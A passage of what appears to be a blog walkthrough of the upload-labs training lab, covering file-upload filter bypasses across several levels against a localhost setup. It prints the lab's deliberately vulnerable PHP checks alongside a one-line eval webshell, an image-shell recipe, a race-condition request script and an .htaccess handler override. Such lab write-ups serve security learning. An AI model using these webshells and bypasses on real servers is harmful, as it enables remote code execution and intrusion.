class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li>拦截方式:<strong>服务端白名单</strong>;</li></ul><ul><li><p>绕过方式:</p><p><strong>利用%00截断绕过</strong>;这一关和Pass-11的区别是,00截断是用在POST中,且是在二进制中进行修改。因为POST不会像GET那样对%00进行自动解码。/在BP中选中%00右键,可以直接编码;</p><ul><li>需关闭magic_quotes_gpc</li><li>php 版本<5.3.4</li></ul></li></ul><p>+++</p><h2 id="Pass-13"><a href="#Pass-13" class="headerlink" title="Pass-13"></a>Pass-13</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:文件未知,上传失败! 
</em></p><p>Hint:</p><blockquote><p>This pass checks the first 2 bytes of the image content!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line"> $bin = fread($file, <span class="number">2</span>); <span class="comment">//only 2 bytes are read</span></span><br><span class="line"> fclose($file);</span><br><span class="line"> $strInfo = @unpack(<span class="string">"C2chars"</span>, $bin); </span><br><span
class="line"> $typeCode = intval($strInfo[<span class="string">'chars1'</span>].$strInfo[<span class="string">'chars2'</span>]); </span><br><span class="line"> $fileType = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>($typeCode){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> $fileType = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> $fileType = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> $fileType = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> $fileType = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $fileType;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_type = getReailFileType($temp_file);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($file_type == <span class="string">'unknown'</span>){</span><br><span 
class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_type;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单</strong>;<strong>getReailFileType函数只会读取文件的前两个字节</strong></p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line">$bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li><p>绕过方式:<strong>图片马+文件包含利用</strong>;</p><ul><li><p>制作图片马:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy <span class="number">1</span>.jpg/<span class="selector-tag">a</span> + <span class="number">1</span>.txt/<span class="selector-tag">b</span> <span class="number">2</span>.jpg</span><br><span class="line"><span 
class="comment">//1.txt中的内容为一句话木马,1.jpg则是一张图片。生成的图片马是2.jpg</span></span><br></pre></td></tr></table></figure></li><li><p>利用include.php实现文件包含</p></li><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line">$file = $_GET[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($file)){</span><br><span class="line"> <span class="keyword">include</span> $file;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li>蚁剑连接</li></ul><p>+++</p><h2 id="Pass-14"><a href="#Pass-14" class="headerlink" title="Pass-14"></a>Pass-14</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:文件未知,上传失败! 
</em></p><p>Hint:</p><blockquote><p>This pass uses getimagesize() to check whether the file is an image!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $types = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(file_exists($filename)){</span><br><span class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(stripos($types,$ext)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> $ext;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span>
<span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单**</strong>;校验了文件头**</p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$info = 
getimagesize($filename);</span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li>Bypass: <strong>image shell + file inclusion</strong>; the image data in front of the PHP tags is what getimagesize() parses, so the same image shell as in Pass-13 passes here too.</li></ul><p>+++</p><h2 id="Pass-15"><a href="#Pass-15" class="headerlink" title="Pass-15"></a>Pass-15</h2><p>The php_exif extension must be enabled (the exif_imagetype() check this pass relies on lives there).</p><p>Bypass: <strong>image shell + file inclusion</strong>;</p><p>+++</p><h2 id="Pass-16"><a href="#Pass-16" class="headerlink" title="Pass-16"></a>Pass-16</h2><p>This pass re-renders the uploaded image. A GIF is used here because it is the format easiest to get past re-rendering. Build a GIF image shell with copy (winhex works as well).</p><p>After uploading it, the shell cannot be used. Download the uploaded (re-rendered) image again and compare it with the original in winhex.</p><p>The byte ranges that re-rendering leaves unchanged are the places where the one-line webshell can be inserted.</p><p>Upload the modified image shell; AntSword connects successfully.</p><p><strong>Image shell against second rendering</strong></p><p>+++</p><h2 id="Pass-17"><a href="#Pass-17" class="headerlink" title="Pass-17"></a>Pass-17</h2><p>Filter: <strong>whitelist check, exploited through a race condition</strong></p><p>This pass moves the file into place first and checks it afterwards (deleting it when the check fails), so the uploaded file has to be requested in the window before the check removes it.</p><p>First create a webshell.php that, when executed once, writes a persistent shell.php next to itself:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> fputs(fopen(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST["cmd"]) ?>'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Then request it continuously with Python</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># Pass-17 moves the file into place before checking it and deletes it afterwards,</span></span><br><span class="line"><span class="comment"># so keep requesting the uploaded path until one request lands inside that window</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> requests.get(<span class="string">"http://localhost/upload-labs/upload/webshell.php"</span>)</span><br></pre></td></tr></table></figure><p>Run the Python script, then start uploading the PHP file (repeat the upload; every attempt opens another window).</p><p>Check whether shell.php has appeared;</p><p>Connect with AntSword;</p><p>+++</p><h1 id="Upload-Labs-文件上传"><a href="#Upload-Labs-文件上传"
class="headerlink" title="Upload Labs 文件上传"></a>Upload Labs 文件上传</h1><p><strong>项目地址</strong>:<a href="https://github.com/c0ny1/upload-labs" target="_blank" rel="noopener">https://github.com/c0ny1/upload-labs</a></p><h2 id="第1关-前端js绕过"><a href="#第1关-前端js绕过" class="headerlink" title="第1关 前端js绕过"></a>第1关 前端js绕过</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><script type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = <span class="built_in">document</span>.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span 
class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name) == <span class="number">-1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><<span class="regexp">/script></span></span><br></pre></td></tr></table></figure><ul><li>前端禁用js</li><li>抓包绕过</li></ul><h2 id="第2关-content-type"><a href="#第2关-content-type" class="headerlink" title="第2关 content-type"></a>第2关 content-type</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span 
class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> (($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span> . 
$_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><h2 id="第3关-php3-phtml"><a href="#第3关-php3-phtml" class="headerlink" title="第3关 php3 phtml"></a>第3关 php3 phtml</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext; </span><br><span class="line"> <span class="keyword">if</span> 
(move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>This is a blacklist check, so try the php3 and phtml extensions instead.</p><p>They only execute if Apache's httpd.conf maps them to the PHP handler:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php <span class="selector-class">.php</span> <span class="selector-class">.php3</span> .phtml</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/qq_19916577/article/details/46502761" target="_blank" rel="noopener">MIME types table</a></p><p><a href="https://www.waitalone.cn/php-windows-upload.html" target="_blank" rel="noopener">When PHP meets Windows: a generic upload flaw (当php邂逅windows通用上传缺陷)</a></p><p>With file uploads we usually think of file-name truncation, such as %00.</p><p>On Windows a colon (":") can truncate as well:</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3<span class="selector-class">.php</span><span class="selector-pseudo">:jpg</span></span><br></pre></td></tr></table></figure><p>The file produced by colon truncation is blank: the part after the colon names an NTFS alternate data stream, and the main stream of the file receives no content.</p><p>So an empty <code>3.php</code> is written.</p><p>In Windows path matching <code><</code> acts as the <code>*</code> wildcard, which matches any sequence of characters, so the upload name can be rewritten to match the empty file just created and write the content into it.</p><p>Change the name to</p><figure class="highlight livecodeserver"><table><tr><td
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">3.<<<</span><br><span class="line"><span class="meta"><?php</span> phpinfo();<span class="meta">?></span></span><br></pre></td></tr></table></figure><h2 id="第4关-htaccess"><a href="#第4关-htaccess" class="headerlink" title="Pass-04 .htaccess"></a>Pass-04 .htaccess</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span 
class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span 
class="comment">// strip trailing dots from the filename</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file is not allowed!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">' folder does not exist, please create it manually!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Still a blacklist, and this one covers almost every dangerous extension, but not <code>.htaccess</code>: for that name strrchr() returns the whole string <code>.htaccess</code> as the extension, and it is not in the list. This level also keeps the original filename when saving (<code>$img_path = UPLOAD_PATH.'/'.$file_name</code>), which is what makes the trick work. So first upload a file named <code>.htaccess</code> with this content:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br></pre></td></tr></table></figure><p>After that, any file uploaded to the directory is parsed as PHP whatever its extension, so a shell can go up as <code>shell.jpg</code>. This depends on Apache running mod_php and on <code>AllowOverride</code> permitting FileInfo directives for the upload directory; with <code>AllowOverride None</code> the .htaccess file is simply ignored.</p><h2 id="第5关-大小写"><a href="#第5关-大小写" class="headerlink" title="Pass-05 Case variants"></a>Pass-05 Case variants</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span 
class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span 
